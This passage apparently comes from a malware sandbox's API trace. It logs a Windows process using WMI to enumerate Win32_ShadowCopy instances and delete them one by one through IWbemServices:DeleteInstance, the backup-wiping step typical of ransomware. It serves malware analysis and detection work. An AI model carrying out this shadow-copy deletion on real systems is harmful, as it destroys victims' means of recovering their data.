pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0132.795] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x53 [0132.795] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0132.795] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0132.795] IUnknown:QueryInterface (in: This=0x212498, riid=0x2e77e70*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0132.795] IUnknown:Release (This=0x212498) returned 0x1 [0132.807] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1ce0) returned 0x0 [0132.807] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1ce0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0132.808] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1ce0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903550) returned 0x0 [0132.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903550, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903550) returned 0x0 [0132.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903550, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0132.808] WbemDefPath:IUnknown:AddRef (This=0x1c903550) returned 0x3 [0132.808] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0132.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903550, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b785e30) returned 0x0 [0132.808] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b785e30, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0132.808] WbemDefPath:IUnknown:Release (This=0x1b785e30) returned 0x3 [0132.809] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0132.809] WbemDefPath:IUnknown:AddRef (This=0x1c903550) returned 0x4 [0132.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903550, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0132.809] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x3 [0132.809] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x2 [0132.809] WbemDefPath:IUnknown:Release (This=0x1c8f1ce0) returned 0x0 [0132.809] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x1 [0132.809] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0132.809] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0132.809] WbemDefPath:IUnknown:AddRef (This=0x1c903550) returned 0x2 [0132.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903550, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903550) returned 0x0 [0132.809] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x2 [0132.810] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x1 [0132.810] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0132.810] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0132.810] WbemDefPath:IUnknown:AddRef (This=0x1c903550) returned 0x2 [0132.810] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903550, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903550) returned 0x0 [0132.810] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x2 [0132.810] WbemDefPath:IUnknown:AddRef (This=0x1c903550) returned 0x3 [0132.810] WbemDefPath:IWbemPath:SetText (This=0x1c903550, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x0 [0132.810] WbemDefPath:IUnknown:Release (This=0x1c903550) returned 0x2 [0132.810] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0132.810] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0132.810] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0132.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0132.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.814] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0132.814] SysStringLen (param_1="root\\cimv2") returned 0xa [0132.814] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0132.814] SysStringLen (param_1="root\\cimv2") returned 0xa [0132.814] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0132.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0132.814] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.814] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0132.814] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0132.815] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0132.815] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0132.818] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903550, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0132.818] WbemDefPath:IWbemPath:GetText (in: This=0x1c903550, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0132.818] WbemDefPath:IWbemPath:GetText (in: This=0x1c903550, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x0 [0132.818] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0132.818] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0132.818] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0132.818] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0132.818] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0132.819] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0132.819] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0132.819] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0132.819] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0132.819] WbemDefPath:IWbemPath:GetText (in: This=0x1c903550, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0132.819] WbemDefPath:IWbemPath:GetText (in: This=0x1c903550, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x0 [0132.819] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0133.496] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0133.496] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c910480, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0133.497] IUnknown:QueryInterface (in: This=0x1c910480, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c910480) returned 0x0 [0133.497] IUnknown:QueryInterface (in: This=0x1c910480, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0133.497] IUnknown:QueryInterface (in: This=0x1c910480, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0133.498] IUnknown:AddRef (This=0x1c910480) returned 0x3 [0133.498] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0133.498] IUnknown:QueryInterface (in: This=0x1c910480, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c910488) returned 0x0 [0133.498] IMarshal:GetUnmarshalClass (in: This=0x1c910488, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0133.498] IUnknown:Release (This=0x1c910488) returned 0x3 [0133.498] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0133.498] IUnknown:AddRef (This=0x1c910480) returned 0x4 [0133.498] IUnknown:QueryInterface (in: This=0x1c910480, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0133.498] IUnknown:Release (This=0x1c910480) returned 0x3 [0133.499] IUnknown:Release (This=0x1c910480) returned 0x2 [0133.499] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0133.499] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0133.499] IUnknown:AddRef (This=0x1c910480) returned 0x3 [0133.499] IUnknown:QueryInterface (in: This=0x1c910480, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c910480) returned 0x0 [0133.499] IUnknown:Release (This=0x1c910480) returned 0x3 [0133.499] IUnknown:Release (This=0x1c910480) returned 0x2 [0133.499] IUnknown:Release (This=0x1c910480) returned 0x1 [0133.499] CoTaskMemFree (pv=0x27f6b0) [0133.499] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0133.499] IUnknown:AddRef (This=0x1c910480) returned 0x2 [0133.499] IWbemClassObject:Get (in: This=0x1c910480, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0133.499] IWbemClassObject:Get (in: This=0x1c910480, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0133.499] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x53 [0133.500] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0133.500] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0133.500] IUnknown:QueryInterface (in: This=0x212498, riid=0x2e77e70*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0133.500] IUnknown:Release (This=0x212498) returned 0x1 [0133.500] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1c00) returned 0x0 [0133.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1c00, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0133.501] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1c00, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903610) returned 0x0 [0133.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903610, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903610) returned 0x0 [0133.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903610, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0133.501] WbemDefPath:IUnknown:AddRef (This=0x1c903610) returned 0x3 [0133.501] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0133.501] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903610, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b785c70) returned 0x0 [0133.501] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b785c70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.501] WbemDefPath:IUnknown:Release (This=0x1b785c70) returned 0x3 [0133.502] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0133.502] WbemDefPath:IUnknown:AddRef (This=0x1c903610) returned 0x4 [0133.502] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903610, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0133.502] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x3 [0133.502] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x2 [0133.502] WbemDefPath:IUnknown:Release (This=0x1c8f1c00) returned 0x0 [0133.502] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x1 [0133.502] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0133.502] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0133.502] WbemDefPath:IUnknown:AddRef (This=0x1c903610) returned 0x2 [0133.502] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903610, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903610) returned 0x0 [0133.502] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x2 [0133.503] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x1 [0133.503] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0133.503] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0133.503] WbemDefPath:IUnknown:AddRef (This=0x1c903610) returned 0x2 [0133.503] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903610, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903610) returned 0x0 [0133.503] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x2 [0133.503] WbemDefPath:IUnknown:AddRef (This=0x1c903610) returned 0x3 [0133.503] WbemDefPath:IWbemPath:SetText (This=0x1c903610, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"") returned 0x0 [0133.503] WbemDefPath:IUnknown:Release (This=0x1c903610) returned 0x2 [0133.503] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0133.503] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0133.503] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") 